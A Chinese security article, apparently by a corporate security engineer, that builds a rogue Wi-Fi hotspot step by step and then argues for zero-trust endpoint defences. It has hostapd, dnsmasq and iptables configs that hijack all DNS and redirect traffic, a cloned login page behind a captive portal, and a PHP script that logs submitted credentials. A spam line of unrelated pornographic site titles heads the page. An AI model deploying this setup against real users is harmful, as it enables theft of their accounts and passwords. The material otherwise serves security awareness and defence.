国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

無線釣魚是一個廣受關注但難以根治的熱點安全話題。本文中，我將以攻擊者視角揭露無線釣魚攻擊的技術原理，包括DNS劫持、Captive Portal、JS緩存投毒等有趣的攻擊利用。隨后將探討企業(yè)該如何幫助員工應對無線釣魚攻擊。企業(yè)內做釣魚熱點防護就夠了嗎？如何進行有效的無線安全意識培訓？使用VPN就能抗住所有攻擊？員工在非信任無線網絡中進行遠程辦公是不可避免的安全挑戰(zhàn)，零信任產品帶來了更多的解決思路。

1. 無線釣魚的背景

2019年，我在前公司時配合湖南衛(wèi)視《新聞大求真》欄目組共同制作了一期關于公共無線熱點安全性的節(jié)目，我們先通過其中片段直觀感受一下公共無線熱點的危險性。

點擊觀看新聞大求真視頻

從無線網絡接入者的角度來看，其安全性完全取決于無線網絡搭建者的身份。受到各種客觀因素的限制，很多數據在無線網絡上傳輸時都是明文的，如一般的網頁、圖片等；還有很多網站或郵件系統甚至在手機用戶進行登錄時，將賬號和密碼也進行了明文傳輸或只是簡單加密傳輸。

1.1 Wi-Fi綿羊墻

很長時間中，無線網絡的安全風險一直未被公眾所熟知。2015年的央視3·15晚會“釣魚熱點”環(huán)節(jié)的演示，才第一次讓國內較為廣大的群體對此有了直觀認識。

在晚會現場，觀眾加入主辦方指定的一個 Wi-Fi 網絡后，用戶手機上正在使用哪些軟件、用戶通過微信朋友圈瀏覽的照片等信息就都被顯示在了大屏幕上。不僅如此，現場大屏幕上還展示了很多用戶的電子郵箱信息。

特別值得一提的是，主持人在采訪一位郵箱密碼被展示出來的現場觀眾時，這位觀眾明確表示，到現場以后并沒有登錄電子郵箱。造成這種情況的原因是該用戶所使用的電子郵箱軟件在手機接入無線網絡后，自動聯網進行了數據更新，而在更新過程中，郵箱的賬號和密碼都被進行了明文傳輸。這個現場實驗告訴我們：攻擊者通過釣魚熱點盜取用戶個人信息，用戶往往是完全感覺不到的。

這個演示環(huán)節(jié)的靈感其實是來源于 DEFCON 黑客大會 Wireless Village 上有名的綿羊墻(The Wall of Sheep)。綿羊墻將收集的賬號和隱匿的密碼投影在影幕上，告訴人們:“你很可能隨時都被監(jiān)視�！蓖瑫r也是為了讓那些參會者難堪——來參加黑客大會的人，自身也不注意安全。

1.2 真實案例

l 用戶在釣魚熱點中進行網購導致密碼泄漏，被盜刷2000元。

l 咖啡店無線網絡被植入惡意代碼，利用用戶設備挖掘門羅幣。

l 騰訊內網有員工反饋在地鐵站中自動連上偽造的公司熱點“XXXXWiFi”，被迫瀏覽“反宣文案”。

2. 無線釣魚底層原理探析

本節(jié)將通過搭建一個無線釣魚熱點，展示該攻擊方式的危害性、隱蔽性和低成本性。讀者將學習到構造一個精密的無線釣魚網絡所涉及的所有實現原理，包括如何使用無線網卡創(chuàng)建熱點、如何吸引更多用戶連接熱點、如何嗅探網絡中的敏感信息、如何利用釣魚網頁獲取用戶敏感信息以及如何配置 Captive Portal 強制用戶訪問釣魚界面。

需要注意的是，本節(jié)的實驗需要無線網卡支持 AP 模式才能建立熱點，如Atheros AR9271、Atheros RTL8812等。

2.1創(chuàng)建無線熱點

hostapd是用于AP和認證服務器的守護進程，它實現了與IEEE 802.11相關的接入管理，支持IEEE 802.1X、WPA、WPA2、EAP、OPEN等認證方式。首先，創(chuàng)建配置文件open.conf：

#open.conf

interface=wlan0

ssid=FreeWiFi

driver=nl80211

channel=1

hw_mode=g

其中 interface 表示無線網卡接口名稱，ssid 表示熱點名稱，channel 表示信道，hw_mode 用于指定無線模式，g代表 IEEE 802.11g。讀者可根據實際情況做相應修改。

除了創(chuàng)建接入點本身外，還需要配置 DHCP 和 DNS 等基礎服務。 dnsmasq 是一款可同時提供 DNS 和 DHCP 服務功能、較易配置的輕量工具。其默認配置文件為/etc/dnsmasq.conf，其中包含大量的注釋，用以說明各項功能及配置方法。在默認情況下，它會開啟 DNS 功能，同時加載系統/etc/resolv.conf 文件中的內容作為上游 DNS 信息。只需要在配置文件中設置特定的 DHCP 地址池范圍和所服務的網絡接口即可。代碼如下：

#/etc/dnsmasq.conf

dhcp-range=172.5.5.100, 172.5.5.250, 12h

interface=wlan0

在運行 hostapd 創(chuàng)建熱點前，還需要使用幾條命令消除系統對網卡 AP 功能的限制，同時為網卡配置 IP 地址、掩碼等信息，最后才能啟動 hostapd 程序。命令如下：

nmcli radio wifi off

rfkill unblock wlan

ifconfig wlan0 172.5.5.1/24

systemctl restart dnsmasq

hostapd open.conf

2.2 吸引用戶連接

將熱點名稱設置為 Free WiFi 類似的字眼就能吸引許多蹭網的用戶主動連接。除此外，攻擊者還有其他辦法讓手機等設備自動連上熱點，例如構建一個用戶之前連過的熱點名稱（如CMCC、StarBucks 等），同樣為無加密的方式。當無線設備搜索到該同名、同加密類型的歷史連接熱點（后文稱為已保存網絡列表）就會嘗試自動連接。那么，是否可以通過某種方式獲取無線設備的已保存網絡列表信息呢？

無線設備為了加快連接速度，在執(zhí)行主動掃描時會對外廣播曾經連接過的無線熱點名稱。一旦攻擊者截獲這個廣播，自然就能知道用戶連過哪些熱點，隨后把所有的無線熱點名稱偽造出來欺騙設備自動連接。

2004 年，Dino dai Zovi 和 Shane Macaulay 兩位安全研究員發(fā)布了 Karma 工具。Karma 能夠收集客戶端主動掃描時泄露的已保存網絡列表并偽造該名稱的無密碼熱點，吸引客戶端自動連接。

如上圖所示，一個客戶端發(fā)出了對兩個不同熱點名稱（Home 和 Work）的 Probe Request 請求， Karma 對包含這兩個熱點名稱的請求都進行了回復。這實際上違反了 802.11 標準協議，無論客戶端請求任何 SSID，Karma 都會向其回復表示自己就是客戶端所請求的熱點，使客戶端發(fā)起連接。

一款知名的無線安全審計設備——WiFi Pineapple（俗稱“大菠蘿”）便內置了 Karma 攻擊的功能，由無線安全審計公司 Hak5 開發(fā)并售賣，從 2008 年起到目前已經發(fā)布到第七代產品。

Hak5 公司的創(chuàng)始人 Darren Kitchen 曾在一次會議上發(fā)表了有關的安全演講。在現場，他開啟Pineapple 進行演示，在屏幕上展示了一份長長的設備清單，包含黑莓、iPhone、Android 和筆記本電腦等。這些設備自認為連接到了賓館或星巴克的 Wi-Fi 熱點，實際上它們都受到了 WiFi Pineapple 的欺騙而連接到其所創(chuàng)建的釣魚網絡。

不過在今天，Karma 攻擊已經不太好使了。因為各手機廠商了解到 Directed Probe Request 會泄露已保存網絡列表信息，可能導致終端遭到釣魚攻擊，所以在較新版本的手機系統中都改變了主動掃描的實現方式：主要是使用不帶 SSID 信息的 Broadcast Probe Request 取代會泄露信息的 Directed Probe Request，兩者的對比如下圖所示。

我們可以采取一些簡單的策略吸引用戶連接：

l 選擇一家提供免費無線網絡、還提供電源和座位的咖啡館

l 熱點名稱改為與店里的免費熱點名稱一致

l 同時發(fā)起deauth拒絕服務攻擊使周圍客戶端掉線觸發(fā)重連

如此就可以將周圍的無線客戶端吸引到我們的釣魚熱點上。

2.3 嗅探敏感信息

當我們的設備能通過無線或有線的方式接入互聯網時，為了使用戶設備上的軟件有更多網絡交互并獲取更多的信息，可以將釣魚網絡的流量轉發(fā)至擁有互聯網權限的網卡，從而使釣魚網絡也能連上外網。可以按照下面的操作步驟進行。首先開啟 IP 路由轉發(fā)功能：

sysctl -w net.ipv4.ip_forward=1

隨后還需設置 iptables 規(guī)則，將來自釣魚網絡的數據包進行 NAT（network address translation，網絡地址轉換）處理并轉發(fā)到外網出口。

iptables -t nat - POSTROUTING -o eth0 -j MASQUERADE

當用戶連入網絡后，由于所有的網絡請求都將經由我們的網卡進行轉發(fā)，所以可以使用 Wireshark、 Tcpdump 等工具直接觀察經過該無線網卡的所有流量。

Driftnet 是一款簡單、實用的圖片捕獲工具，可以很方便地抓取網絡流量中的圖片。使用

driftnet -i wlan0

命令運行 Driftnet 程序，會在彈出的窗口中實時顯示用戶正在瀏覽的網頁中的圖片。

2.4 配置惡意DNS服務

很多時候，我們會面臨無外網的情況，用戶設備上的軟件由于無法與其服務器交互，大大減少了敏感信息暴露的機會。除了被動嗅探流量中的信息外，還可以在本地部署釣魚網站來誘導用戶填入敏感信息。

無線客戶端連接網絡時，通過 DHCP 服務不僅能獲取到本地的 IP 地址，還包括 DHCP 服務指定的 DNS 服務地址。當我們可以決定用戶的 DNS 解析結果時，釣魚攻擊就可以達到比較完美的效果——界面和域名都與真實網址一致。在本節(jié)中，我們將學習如何操縱用戶的 DNS 解析結果，從而將用戶對任意網址的訪問解析到本地。

實驗目的：克隆 www.google.cn 界面到本地，并使無線客戶端對指定網頁的訪問指向該克隆界面。

（1）打開網頁 www.google.cn，通過把網頁“另存為”的方式，將代碼下載到本地。接著需要配置 Web 服務器，以 nginx 為例，打開配置文件/etc/nginx/sites-enable/default，輸入以下內容：

server {

listen 80 default_server;

root /var/www/fakesite;

index index.html

location / {

try_files $uri $uri/ /index.html;

}

}

(2) 該配置文件指定本地 Web 服務監(jiān)聽 80 端口并以/var/www/fakesite 為根目錄，將下載的 HTML代碼放置到 Web 目錄中并重啟 nginx 服務，隨后通過瀏覽器訪問 172.5.5.1 查看效果。隨后對 DNS 服務進行配置，同樣打開 dnsmasq 的配置文件/etc/dnsmasq.conf，以 address=/url/ip的格式寫入解析規(guī)則，表示將指定 URL 解析到指定 IP 地址。如果 url 處填寫為#，將解析所有的地址，隨后重啟 dnsmasq 服務。

#/etc/dnsmasq.conf

address=/#/172.5.5.1

systemctl restart nginx

systemctl restart dnsmasq

（3）通過手機連接該熱點，對任意地址進行訪問測試（如 baidu.com），如果配置無誤，將出現如圖所示的效果。

2.5 配置Captive Portal

Captive Portal 認證通常被部署在公共無線網絡中，當未認證用戶連接時，會強制用戶跳轉到指定界面。

在 iOS、Android、Windows、Mac OS X 等系統中其實已經包含了對 Captive Portal 的檢測，以 Android 系統為例，當設備連入無線網絡時會嘗試請求訪問clients3.google. com/generate_204并根據返回結果來判斷網絡狀況。

l 當返回 HTTP 204 時，表示網絡正常；

l 如果返回了HTTP 302 跳轉，手機就會認為該網絡存在網絡認證，并以彈窗等方式顯示在手機中，如下圖所示的提示信息。

l iOS、Windows 等系統也都采取類似的檢測邏輯。

單擊該提示就會直接打開認證界面。顯然，一個熱點配置了 Captive Portal 后會更顯得像是一個“正式”的熱點，同時利用該特性能讓用戶直達釣魚界面。

我們使用iptables來轉換流量。iptables 是一種能完成封包過濾、重定向和網絡地址轉換（NAT）等功能的命令行工具。借助這個工具可以把用戶的安全設定規(guī)則執(zhí)行到底層安全框架 netfilter 中，起到防火墻的作用。

通過 iptables 對來自無線網絡的流量進行配置：

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 172.5.5.1:80

iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j DNAT --to-destination 172.5.5.1:53

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 53 -j DNAT --to-destination 172.5.5.1:53

在上述命令中，第1行表示將來自 NAT 網絡的對 80 端口的數據請求都指向 172.5.5.1 的 80 端口；第 2~3 行表示將來自 NAT 網絡的對 53 端口的 TCP、UDP 請求都指向 172.5.5.1的 53 端口。

接下來的任務是在本地啟動HTTP服務，并配置網頁信息及對相應請求的 302跳轉等。同樣以nginx為例，打開/etc/nginx/sites-enabled/default 文件，修改為以下配置：

server {

listen 80 default_server;

root /var/www/html;

location / {

try_files $uri $uri/ /index.html;

}

location ~ \.php$ {

includesnippets/fastcgi-php.conf;

fastcgi_passunix:/var/run/php/php7.0-fpm.sock;

}

}

在上述配置中，會將/var/www/html 指定為 Web 根目錄，當訪問不存在的路徑時都會被 302 跳轉到 index.html 文件。同時還開啟了對 PHP 文件的解析，因為后續(xù)會使用 PHP 程序來將用戶輸入的賬號保存到本地。

使用網絡上下載的Gmail釣魚模板，將提交賬號信息的form表單指向post.php。

#post.php

<?php

$file = 'log.txt';

file_put_contents($file, print_r($_POST, true), FILE_APPEND);

?>

<meta http-equiv="refresh" content="0; url=./.." />

最后，重啟nginx 及php 服務使配置生效，命令如下：

systemctl restart nginx

systemctl restart php7.0-fpm

使用手機連接該熱點，會立即得到需要認證的提示。打開提示后便出現了預設的釣魚界面。可以嘗試在登錄框中輸入任意賬號密碼并單擊Sign in 按鈕進行提交。

在Web 根目錄下，可以查看記錄了用戶輸入信息的log.txt 文件，內容如下圖所示。

2.6 其他的利用案例

l 在多屆Pwn2own比賽上，許多通過瀏覽器發(fā)起的攻擊都利用了Wi-Fi Captive Portal的特性來觸發(fā)瀏覽器漏洞。

l 在2018年日本CodeBlue會議上，筆者和前同事展示了一個議題《RCE with Captive Portal)》，介紹了一種組合攻擊方法，利用無線網絡強制門戶的特性與Windows系統的一系列漏洞來達到遠程代碼執(zhí)行的效果。

l JS緩存投毒

由于在釣魚熱點中可以劫持DNS服務器，加上企業(yè)內網存在大量非https的網站現狀，攻擊者可以有針對性的將惡意JS文件緩存在受害者瀏覽器中，當員工訪問內網時惡意JS文件將會被喚醒執(zhí)行。

3. 企業(yè)無線釣魚防護的窘境與突破

3.1 普通用戶的應對策略

前面的內容以攻擊者的角度詳細討論了釣魚熱點的構建方式及可能造成的危害，相信讀者已經體會到這是一種低成本、高回報的攻擊方式。那么作為普通用戶，該如何避免遭到釣魚熱點的攻擊呢？可以遵循以下簡單規(guī)則來保護個人數據：

(1) 對公共Wi-Fi網絡采取不信任的態(tài)度，盡量不連接沒有密碼保護的無線網絡。

(2) 在使用公共熱點時，盡量避免輸入社交網絡、郵件服務、網上銀行等登錄信息，避免使用網銀、支付寶等包含敏感信息的應用軟件。

(3) 在不使用Wi-Fi時關閉Wi-Fi功能，避免自動連接功能帶來的風險。

(4) 在有條件的情況下，使用虛擬專用網絡（VPN）連接，這將使用戶數據通過受保護的隧道傳輸。

3.2 企業(yè)無線釣魚防護的窘境

普通用戶的應對策略都依靠用戶自身的安全意識，實際上對于企業(yè)級用戶而言，要求每一位員工都擁有良好的無線安全意識且能在日常使用時做到，是很難達到的。當然，企業(yè)也會采取其他一些防護措施以盡可能緩解無線安全威脅，但效果都不夠理想，常見以下三個話題：

l 如何做有效的無線安全意識培訓？

l 部署WIPS產品阻斷惡意熱點能解決所有問題嗎？

l VPN能抗住所有攻擊嗎？

（1）無線安全意識培訓

筆者在前公司安全團隊曾策劃了一次針對公司內部全體員工的RedTeam無線釣魚活動，通過精心設計“薅羊毛活動”、精美的彩印宣傳單、釣魚網頁等素材，在約半小時內誘導80位員工連入釣魚熱點并獲取他們的域賬號。下圖為前老板對該次無線釣魚演習的評論，以此督促全體員工加強對無線安全的重視。

事實上，在該活動實施的前一個月正是內部的“無線安全月”，在公司內部通過大量的文字和宣傳冊，以及參與活動領獎品的方法來告訴員工無線安全的重要性和注意事項。但實踐說明，再多的安全播報、新聞稿可能抵不過一條薅羊毛信息。而對于參與到該釣魚活動并中招的員工來說，可能他這輩子都能記住不要亂連Wi-Fi及核實消息來源。

（2）WIPS阻斷熱點

部分企業(yè)AP產品或單獨部署的WIPS產品（無線入侵防御系統）帶有熱點阻斷功能，通過MAC地址黑白名單的策略來觸發(fā)自動阻斷嫌疑熱點，但從實際的運營中會發(fā)現會殘留以下問題：

l 攻擊者可能偽造白名單熱點的MAC地址。

l 對于非同名的釣魚熱點，很難發(fā)現與監(jiān)管。

l 防御范圍僅能實施在大廈內。

因此，阻斷熱點的功能并不能解決所有的釣魚熱點問題。

（3） VPN

在Wi-Fi場景中，根據Captive Portal和VPN狀態(tài)可劃分出三個階段：

1. Captive Portal認證前。

2. Captive Portal認證后、VPN連接前。

3. VPN連接后。

大部分VPN產品僅能在第三階段提供流量加密和部分防護功能，而在第二節(jié)的內容中我們已經了解到了在VPN開啟前攻擊無線客戶端的多種手法，所以想單憑VPN的能力來防范所有的無線攻擊是不現實的。

3.3 企業(yè)無線釣魚防護的突破

在2020年疫情大背景下，全球企業(yè)都被迫加速員工移動化辦公、遠程辦公的實施進程，這也再次帶動了業(yè)界對網絡邊緣安全性的重點關注。

我在導讀中提到“員工在非信任無線網絡中進行遠程辦公是不可避免的安全挑戰(zhàn)”，在遠程辦公這種脫離內網的網絡條件下，無法采取網絡層面的入侵檢測等防護手段，唯一可實施切入的便是終端上的安全能力，但傳統的VPN產品和終端安全軟件產品在提供安全管控、身份管理、訪問準入的能力上是各自為戰(zhàn)、相互割裂的狀態(tài)，這就亟需一種有效的方式把這些能力聯合在一起，可以根據具體場景相互配合來為決策提供信息支撐。

在我加入騰訊，實際體驗使用了內部的iOA零信任產品后，發(fā)現在零信任網絡接入的框架下，員工終端設備需要具有終端檢測和防護等安全模塊，對每一個訪問企業(yè)資源的會話請求，都需要進行用戶身份驗證、設備安全狀態(tài)、軟件應用安全狀態(tài)檢查和授權，并進行全鏈路加密。過程中的驗證本質上就是一系列的合規(guī)檢查，從邏輯上可劃分為四類：可信身份、可信終端、可信應用、可信鏈路，如下圖所示。

針對我們在公共場所遠程辦公的場景，新接入的設備需要統一安裝Agent，通過遠程下發(fā)策略提供統一標準化的要求，其中就可以把對無線釣魚攻擊的檢測和防護作為安全準入的合規(guī)條件，如下圖所示。

因此，我們再次回頭看看前文提到的多種無線釣魚攻擊手段，可以發(fā)現，以零信任理念構建的終端安全產品可以做到防止員工連入釣魚熱點，或即使連入了釣魚熱點也能受到保護：

偽造公司熱點無線釣魚攻擊——公司內部真實無線熱點的數據我們是掌握的，因此當用戶設備主動或被動連接開放式網絡時，零信任終端安全產品可結合正在連接熱點的MAC地址及其他無線特征進行WiFi接入點身份驗證，驗證失敗時拒絕訪問請求并警告用戶遭到無線釣魚攻擊。

DNS劫持——當設備通過DHCP服務獲取IP地址時，也采取了該網絡指定的DNS地址。零信任終端安全產品可以對設備DNS狀態(tài)進行合規(guī)性檢查，可以采取強制指定DNS服務地址的策略，或檢測該DNS服務對互聯網重點域名或公司相關域名的解析是否正常。驗證失敗時拒絕訪問請求并幫助用戶修復異常DNS狀態(tài)。

Captive Portal安全加固——Captive Portal實現依賴于階段性的DNS劫持，如果一開始就修正DNS，可能導致用戶無法跳轉到認證頁面完成認證。因此，需要對Captive Portal進行檢測并實施相應的加固。在用戶完成網絡認證后，再進行DNS緩存清理和修正工作。

認證網頁釣魚——攻擊者可能利用Captive Portal認證頁面對員工進行社工欺騙，獲取其敏感信息等。零信任終端安全產品可以對Captive Portal瀏覽器進行安全加固，并加上醒目的安全提示，避免員工主動輸入企業(yè)相關敏感信息。

Windows hash泄漏——零信任終端安全產品可以對此進行安全加固，防止Windows hash被泄漏。

局域網攻擊威脅——當員工設備連入目標無線網絡后，設備所開放的各種服務端口可能被局域網中的其他設備所利用或攻擊，零信任終端安全產品同樣具有傳統終端安全軟件的防護能力，以發(fā)現并阻斷來自網絡的攻擊。

敏感信息監(jiān)聽威脅——攻擊者可在網關處監(jiān)聽到所有的明文流量，零信任終端安全產品通過開啟全鏈路加密來避免鏈路上的監(jiān)聽威脅。

通過對以上攻擊手段的逐一分析，可以發(fā)現，零信任架構下的終端安全產品可以在無線網絡接入的多個階段幫助設備緩解攻擊威脅。在對內網服務發(fā)起訪問請求時，可以對設備進行多維度的安全合規(guī)驗證，驗證失敗時請求會被拒絕，告知用戶當前異常狀態(tài)并幫助用戶進行相應清洗。當驗證通過后，會建立起全鏈路加密來保護所有網絡流量。

正因如此，筆者認為零信任架構可以很好的幫助企業(yè)解決無線釣魚攻擊等各類無線安全頑疾。